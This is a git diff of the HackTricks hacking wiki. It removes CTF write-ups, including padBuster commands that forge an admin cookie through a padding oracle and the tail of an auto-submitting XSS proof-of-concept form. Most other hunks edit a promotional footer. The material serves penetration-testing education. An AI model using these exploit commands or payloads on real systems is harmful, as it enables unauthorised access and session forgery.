91;0&#93;&#91;9&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;10&#93;&#43;&#91;e&#43;e&#93;&#91;0&#93;&#91;11&#93;&#93;&#91;62&#93;&#93;&#125;&#96;" />
-      <input type="submit" value="Submit request" />
-    </form>
-    <script>
-      document.forms[0].submit();
-    </script>
-  </body>
-</html>
-```
-
-Finally, **serve the poc in a HTTP** server and access it from the browser:\\
-
-![](https://i.imgur.com/qack7GO.png)
-
-Just press **submit** on the captcha form and the alert will be executed:
-
-![](https://i.imgur.com/mCORty3.png)
-
-<details>
-
-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
-
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-
-</details>
diff --git a/ctf-write-ups/try-hack-me/README.md b/ctf-write-ups/try-hack-me/README.md
deleted file mode 100644
index cfeec6e71..000000000
--- a/ctf-write-ups/try-hack-me/README.md
+++ /dev/null
@@ -1,34 +0,0 @@
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
diff --git a/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md b/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md
deleted file mode 100644
index a057eeba2..000000000
--- a/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md
+++ /dev/null
@@ -1,63 +0,0 @@
-# hc0n Christmas CTF - 2019
-
-<details>
-
-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
-
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-
-</details>
-
-![](../../.gitbook/assets/41d0cdc8d99a8a3de2758ccbdf637a21.jpeg)
-
-## Enumeration
-
-I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion):
-
-![](<../../.gitbook/assets/image (244).png>)
-
-There are 2 ports open: 80 (**HTTP**) and 22 (**SSH**)
-
-In the web page you can **register new users**, and I noticed that **the length of the cookie depends on the length of the username** indicated:
-
-![](<../../.gitbook/assets/image (245).png>)
-
-![](<../../.gitbook/assets/image (246).png>)
-
-And if you change some **byte** of the **cookie** you get this error:
-
-![](<../../.gitbook/assets/image (247).png>)
-
-With this information and[ **reading the padding oracle vulnerability**](../../cryptography/padding-oracle-priv.md) I was able to exploit it:
-
-```bash
-perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy"
-```
-
-![](<../../.gitbook/assets/image (248).png>)
-
-![](<../../.gitbook/assets/image (249) (1).png>)
-
-**Set user admin:**
-
-```bash
-perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" -plaintext "user=admin"
-```
-
-![](<../../.gitbook/assets/image (250).png>)
-
-<details>
-
-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
-
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-
-</details>
diff --git a/ctf-write-ups/try-hack-me/pickle-rick.md b/ctf-write-ups/try-hack-me/pickle-rick.md
deleted file mode 100644
index 6c39a7799..000000000
--- a/ctf-write-ups/try-hack-me/pickle-rick.md
+++ /dev/null
@@ -1,91 +0,0 @@
-# Pickle Rick
-
-## Pickle Rick
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-![](../../.gitbook/assets/picklerick.gif)
-
-This machine was categorised as easy and it was pretty easy.
-
-## Enumeration
-
-I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion):
-
-![](<../../.gitbook/assets/image (79) (2).png>)
-
-In as you can see 2 ports are open: 80 (**HTTP**) and 22 (**SSH**)
-
-So, I launched legion to enumerate the HTTP service:
-
-![](<../../.gitbook/assets/image (234).png>)
-
-Note that in the image you can see that `robots.txt` contains the string `Wubbalubbadubdub`
-
-After some seconds I reviewed what `disearch` has already discovered :
-
-![](<../../.gitbook/assets/image (235).png>)
-
-![](<../../.gitbook/assets/image (236).png>)
-
-And as you may see in the last image a **login** page was discovered.
-
-Checking the source code of the root page, a username is discovered: `R1ckRul3s`
-
-![](<../../.gitbook/assets/image (237) (1).png>)
-
-Therefore, you can login on the login page using the credentials `R1ckRul3s:Wubbalubbadubdub`
-
-## User
-
-Using those credentials you will access a portal where you can execute commands:
-
-![](<../../.gitbook/assets/image (241).png>)
-
-Some commands like cat aren't allowed but you can read the first ingredient (flag) using for example grep:
-
-![](<../../.gitbook/assets/image (242).png>)
-
-Then I used:
-
-![](<../../.gitbook/assets/image (243) (1).png>)
-
-To obtain a reverse shell:
-
-![](<../../.gitbook/assets/image (239) (1).png>)
-
-The **second ingredient** can be found in `/home/rick`
-
-![](<../../.gitbook/assets/image (240).png>)
-
-## Root
-
-The user **www-data can execute anything as sudo**:
-
-![](<../../.gitbook/assets/image (238).png>)
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md
index a452414e8..d37ca7413 100644
--- a/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md
+++ b/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -97,7 +97,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md
index 8a57b1b89..fc3a839a1 100644
--- a/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md
+++ b/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -173,7 +173,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md
index cb94c28da..7ecb9c6dc 100644
--- a/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md
+++ b/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -108,7 +108,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
index 0bab8bda3..d5eb7fda1 100644
--- a/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
+++ b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -224,7 +224,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
index ef4d355d1..3e93f306b 100644
--- a/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
+++ b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -126,7 +126,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/linux-hardening/useful-linux-commands/README.md b/linux-hardening/useful-linux-commands/README.md
index 73a1a2393..af9cb8722 100644
--- a/linux-hardening/useful-linux-commands/README.md
+++ b/linux-hardening/useful-linux-commands/README.md
@@ -17,7 +17,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -344,7 +344,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md b/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
index a47950b6f..44c69dedd 100644
--- a/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
+++ b/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -385,7 +385,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/linux-unix/privilege-escalation/exploiting-yum.md b/linux-unix/privilege-escalation/exploiting-yum.md
index 120b59484..620149dcd 100644
--- a/linux-unix/privilege-escalation/exploiting-yum.md
+++ b/linux-unix/privilege-escalation/exploiting-yum.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
